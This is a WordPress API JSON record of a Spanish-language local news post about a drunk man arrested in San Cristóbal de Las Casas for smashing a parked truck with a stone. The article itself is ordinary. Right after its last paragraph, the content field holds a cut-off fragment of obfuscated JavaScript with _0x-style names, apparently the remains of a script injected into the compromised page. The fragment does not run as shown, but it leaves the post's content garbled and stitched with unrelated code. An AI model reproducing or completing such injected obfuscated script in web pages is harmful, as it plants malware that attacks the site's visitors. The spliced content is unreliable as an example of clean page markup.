{"id":17620,"date":"2024-09-02T03:09:37","date_gmt":"2024-09-02T03:09:37","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=17620"},"modified":"2024-09-02T03:09:38","modified_gmt":"2024-09-02T03:09:38","slug":"por-danos-a-vehiculo-detienen-a-presunto-responsable-en-san-cristobal","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=17620","title":{"rendered":"Por da\u00f1os a veh\u00edculo, detienen a presunto responsable en San Crist\u00f3bal"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"411\" height=\"561\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/IMG-20240901-WA0005.jpg\" alt=\"\" class=\"wp-image-17621\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/IMG-20240901-WA0005.jpg 411w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/IMG-20240901-WA0005-220x300.jpg 220w\" sizes=\"auto, (max-width: 411px) 100vw, 411px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>1 de septiembre del 2024. San Crist\u00f3bal de Las Casas.- La noche de este s\u00e1bado, tras recibir llamado de emergencia, elementos de la Polic\u00eda Municipal, pusieron a disposici\u00f3n del ministerio p\u00fablico a Diego Marcelo \u201cN N\u201d, de 27 a\u00f1os de edad, originario de la comunidad San Pedro Pedernal, municipio de Huixt\u00e1n, por su presunta responsabilidad en el delito de da\u00f1os, cometidos en agravio del propietario de un veh\u00edculo.<\/p>\n\n\n\n<p>Los hechos se registraron alrededor de las 21:00 horas, cuando el hoy imputado -en completo estado de ebriedad- caus\u00f3 da\u00f1os con una piedra a una camioneta Lincoln, de color guinda, la cual se encontraba estacionada sobre el Eje Vial 1, en el Barrio de San Diego, por lo que Jos\u00e9 Alfonso \u201cN N\u201d, al percatarse de lo que ocurr\u00eda a su veh\u00edculo, solicit\u00f3 el apoyo de la Polic\u00eda Municipal.<\/p>\n\n\n\n<p>Con apoyo del afectado y de algunos familiares, elementos municipales detuvieron al agresor y lo trasladaron a la Fiscal\u00eda de Justicia Ind\u00edgena, donde est\u00e1 representaci\u00f3n social determinar\u00e1 su situaci\u00f3n jur\u00eddica conforme a derecho.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 1 de septiembre del 2024. San Crist\u00f3bal de Las Casas.- La noche de este s\u00e1bado, tras recibir llamado de emergencia, elementos de la Polic\u00eda Municipal, pusieron a disposici\u00f3n del ministerio p\u00fablico a Diego Marcelo \u201cN N\u201d, de 27 a\u00f1os de edad, originario de la comunidad San Pedro Pedernal, municipio de Huixt\u00e1n, por &hellip;<\/p>\n","protected":false},"author":2,"featured_media":17621,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-17620","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17620","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=17620"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17620\/revisions"}],"predecessor-version":[{"id":17622,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17620\/revisions\/17622"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/17621"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=17620"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=17620"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=17620"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}